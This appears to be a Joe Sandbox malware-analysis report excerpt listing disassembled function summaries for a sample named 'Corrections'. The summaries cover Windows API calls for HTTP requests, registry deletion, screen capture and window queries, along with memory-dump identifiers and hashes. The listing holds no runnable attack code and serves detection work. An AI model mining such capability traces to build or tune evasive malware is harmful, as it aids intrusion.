                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                            • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                            • Opcode ID: 42fafcfe437fc3b1a84deac29bacfde299a6d39782423d9cc60484e29b8bbe80
                                                                                                                                                                                                                                                                                            • Instruction ID: 224ade5d0d4c110ed53959e43289f7817f78e98c305e027b825f1239f186efe3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42fafcfe437fc3b1a84deac29bacfde299a6d39782423d9cc60484e29b8bbe80
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD616A71108305AFC705EF64DD85EAFBBE8EFC8760F400A1DF695921A1DB70AA49CB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0099CEF5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0099CF08
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0099CF1C
                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0099CF35
                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0099CF78
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0099CF8E
                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0099CF99
                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0099CFC9
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0099D021
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0099D035
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0099D040
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                            • Opcode ID: cd461ff285a3d0dcf35e95725d7f68549009e22f83177f4c1087514f3fbd2e44
                                                                                                                                                                                                                                                                                            • Instruction ID: 4b82ccf75a72de15e939bee20d5b58f9184c4927d44add756d22a2ec8ebe9192
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd461ff285a3d0dcf35e95725d7f68549009e22f83177f4c1087514f3fbd2e44
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551ADB1502608BFEB219F64CD88ABB7BFCFF09394F00451AF94696210E734D945EB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009B66D6,?,?), ref: 009B8FEE
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B8FFE
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9009
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9016
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 009B9024
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9033
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 009B903C
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9043
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9054
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,009C0C04,?), ref: 009B906D
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 009B907D
                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 009B909D
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 009B90CD
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 009B90F5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009B910B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f7996d95abad31c6cbb607adb219a1bb664be7567a05736e628f68fdc07b5a59
                                                                                                                                                                                                                                                                                            • Instruction ID: 0f8ad00828188a89ce45faf83854b6d2536bcc2aa26d624b77e7ffea908e778a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7996d95abad31c6cbb607adb219a1bb664be7567a05736e628f68fdc07b5a59
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F416975615208FFDB109F69DE88EAA7BBCFF89724F008158F905D7260E7309901EB20
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC154
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC1D2
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 009AC26A
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 009AC2DE
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 009AC2FC
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 009AC352
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009AC364
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 009AC382
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 009AC3E3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009AC3F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: 89e19c33fdaa93d559b06bfd776751ba3f339b38902022421b2753948a8e4917
                                                                                                                                                                                                                                                                                            • Instruction ID: e2e9194d90232b0b3d9d01bce801396aefffe13aaf8b30e84801c45cc85616d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89e19c33fdaa93d559b06bfd776751ba3f339b38902022421b2753948a8e4917
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63C17C75208201AFDB14DF54C484F6ABBE5BF85318F14899CE46A8F2A2CB75EC46CBD1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 009A3035
                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009A3045
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 009A3051
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 009A305E
                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009A30CA
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009A3109
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009A312D
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 009A3135
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 009A313E
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 009A3145
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 009A3150
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                            • Opcode ID: dafea7c0563a08992aa83bc0e326ecf25d50e94f003e8155c3a69c72aa556b5f
                                                                                                                                                                                                                                                                                            • Instruction ID: 34a0cb6023735e7b249a2d8104f114c636bd370ccd89251bf441a13cc8ec1b11
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dafea7c0563a08992aa83bc0e326ecf25d50e94f003e8155c3a69c72aa556b5f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8611371D14219EFCF04CFA8D984EAEBBB5FF88310F208529E555A7210E771A901DF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 009BA990
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 009BA9A7
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 009BA9B3
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 009BA9C9
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 009BAC15
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009BAC33
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009BAC54
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 009BAC73
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 009BAC95
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 009BACBB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 70397bf5d4c81c4a568550b61a1a13c6959aced9dd32bd1d9d2523c8bb1f4749
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ceafcd99816f4d2422ed2101d2a63e1bf8380d90b3f2a5676f4a0e98512ece5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70397bf5d4c81c4a568550b61a1a13c6959aced9dd32bd1d9d2523c8bb1f4749
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FB17831600219EFDF14CF69CA847EE7BF6BF44724F188069EC849A295D770A980DB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 009852E6
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00985328
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00985339
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00985345
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0098537A
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 009853B2
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 009853EB
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00985445
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00985477
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 009854EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                            • Opcode ID: 5dc9a1dc539d44c6b02c1c3c90bb75d1d7ce0e87d5459d2ca53f9a93631d7b98
                                                                                                                                                                                                                                                                                            • Instruction ID: e2a57af8836d4d86b83250c5972ebdd14011c39b3f8ff993df3e8dd057706aab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dc9a1dc539d44c6b02c1c3c90bb75d1d7ce0e87d5459d2ca53f9a93631d7b98
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D691E571104B06EFD708EF24D984BAAB7EDFF41344F014519FA8A82291EB31ED59CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009B97B6
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 009B97C6
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 009B97D1
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 009B9879
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009B992B
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 009B9948
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 009B9958
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009B998A
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009B99CC
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009B99FD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 7bbb8755dd7a97a9becc495e300ffc52b9b6eb0c7fb9d35b2ced3565034b798d
                                                                                                                                                                                                                                                                                            • Instruction ID: e74064c2c0d9ffec85f81c4694938d629da0e019b8e15efa45e9976daf6ada8c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bbb8755dd7a97a9becc495e300ffc52b9b6eb0c7fb9d35b2ced3565034b798d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D81DF715283019FD720CF24DA84AAB7BE8FF89764F100A1DFA8597291DB70D905CBA2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(009F29C0,000000FF,00000000,00000030), ref: 0098C973
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(009F29C0,00000004,00000000,00000030), ref: 0098C9A8
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0098C9BA
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0098CA00
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0098CA1D
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 0098CA49
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 0098CA90
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098CAD6
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098CAEB
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098CB0C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 01eef13bc64f0d6730e883ee7ac2bc118ebb5df1595088ae99b1f6dad785814c
                                                                                                                                                                                                                                                                                            • Instruction ID: ee444bc433d24ec3c1313221a588dfec59c8a890343b4c996d0239dcedb5b6c8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01eef13bc64f0d6730e883ee7ac2bc118ebb5df1595088ae99b1f6dad785814c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C61ABB0A1020AAFDF25EFA8D989EEE7BA8FB05358F040155F911A3391D775AD00DB70
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0098E4D4
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0098E4FA
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098E504
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0098E554
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0098E570
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
